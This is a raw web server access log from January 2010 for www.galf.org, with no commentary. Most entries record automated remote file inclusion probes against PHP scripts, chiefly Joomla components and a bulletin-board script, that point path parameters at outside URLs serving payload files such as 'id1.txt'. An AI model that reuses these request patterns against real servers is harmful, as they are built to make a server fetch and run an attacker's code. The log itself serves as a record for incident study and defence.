174.37.162.130 - - [31/Jan/2010:20:44:16 -0800] "GET /?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:44:16 -0800] "GET /logs//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:20:46:39 -0800] "GET /logs/access_100125.log%20%20//?_zb_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [31/Jan/2010:20:47:46 -0800] "GET /?_zb_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [31/Jan/2010:20:47:46 -0800] "GET /logs//?_zb_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
68.109.233.150 - - [31/Jan/2010:20:47:48 -0800] "GET /logs/access.log%20%20//?_zb_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:20:50:44 -0800] "GET /logs//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:20:50:44 -0800] "GET /logs/access.log//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
84.19.168.8 - - [31/Jan/2010:20:50:44 -0800] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:22 -0800] "GET /oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:22 -0800] "GET /logs/access_090921.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:22 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:22 -0800] "GET /oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:22 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:22 -0800] "GET /logs/access_090921.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:28 -0800] "GET /logs/access_090706.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:28 -0800] "GET /logs/access_090706.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:31 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:31 -0800] "GET /oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:31 -0800] "GET /logs/access_090921.log//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:32 -0800] "GET /oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:32 -0800] "GET /logs/access_090921.log//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:32 -0800] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:36 -0800] "GET /logs/access_090706.log//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.77.123 - - [31/Jan/2010:20:51:38 -0800] "GET /logs/access_090706.log//oneadmin/photogallery/include.php?path[docroot]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:20:52:16 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:20:52:16 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:20:52:16 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
188.40.203.226 - - [31/Jan/2010:20:52:16 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.maggard.net/maggard/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [31/Jan/2010:20:52:38 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [31/Jan/2010:20:52:38 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [31/Jan/2010:20:52:38 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [31/Jan/2010:20:52:48 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [31/Jan/2010:20:53:38 -0800] "GET /cendoc.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:20:53:46 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:20:53:46 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.48.18.241 - - [31/Jan/2010:20:53:47 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.42.184 - - [31/Jan/2010:20:54:49 -0800] "GET /logs//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.42.184 - - [31/Jan/2010:20:54:49 -0800] "GET /com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.42.184 - - [31/Jan/2010:20:54:49 -0800] "GET /logs/access_090803.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.19.42.184 - - [31/Jan/2010:20:55:06 -0800] "GET /logs/access_091207.log//com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:03:46 -0800] "GET /logs/access.log%20%20//administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
207.46.199.190 - - [31/Jan/2010:21:04:39 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:09:07 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:09:07 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:09:07 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:10:07 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:10:07 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:10:07 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:11:49 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:11:49 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:11:49 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.37 - - [31/Jan/2010:21:12:19 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=69&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; E3003 FI; SV1; .NET CLR 1.1.4322)" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:01 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:01 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:01 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:08 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:08 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:08 -0800] "GET /logs/access_090720.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:08 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:08 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:11 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:11 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:11 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:13 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:13 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:14 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:14 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:14 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:20 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:20 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:20 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:20 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:20 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
221.139.0.75 - - [31/Jan/2010:21:15:20 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:24 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:24 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:24 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:35 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:38 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:38 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:38 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:44 -0800] "GET /logs/access_090720.log///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.210.38.8 - - [31/Jan/2010:21:15:44 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:58 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:58 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:15:58 -0800] "GET /logs/access.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:18:23 -0800] "GET /logs/access.log//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:18:23 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.244.57 - - [31/Jan/2010:21:18:23 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki6.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:21:19:33 -0800] "GET /delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:21:19:33 -0800] "GET /logs/access.log%20%20/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:21:19:33 -0800] "GET /logs/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:20:48 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:20:48 -0800] "GET /?sourcedir=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:21:21:28 -0800] "GET /logs/access_100125.log%20%20/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:22:01 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.17.71 - - [31/Jan/2010:21:26:38 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.17.71 - - [31/Jan/2010:21:26:38 -0800] "GET /logs/access_100118.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.17.71 - - [31/Jan/2010:21:26:38 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:21:28:24 -0800] "GET /logs/access.log/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
174.37.162.130 - - [31/Jan/2010:21:30:14 -0800] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [31/Jan/2010:21:30:33 -0800] "GET /logs/access_091012.log HTTP/1.1" 200 7194106 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:31:30 -0800] "GET /db.php?path_local=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:31:30 -0800] "GET /logs/db.php?path_local=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:31:30 -0800] "GET /logs/access_091214.log%20%20/db.php?path_local=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:31:57 -0800] "GET /db.php?path_local=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:31:57 -0800] "GET /logs/db.php?path_local=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
123.143.29.250 - - [31/Jan/2010:21:31:57 -0800] "GET /logs/access_091214.log%20%20/db.php?path_local=http://aisnw.com/board/skin/latest/calendar/img/res1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:33:56 -0800] "GET /logs/access_091221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:33:56 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:33:57 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.19.168.8 - - [31/Jan/2010:21:34:19 -0800] "GET /logs/access_100111.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:34:19 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:34:19 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:34:19 -0800] "GET /logs/access_090720.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:34:20 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:34:20 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:34:20 -0800] "GET /logs/access_090720.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:35:23 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.110.160.78 - - [31/Jan/2010:21:35:23 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://etkbc.org/Images/Ba/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
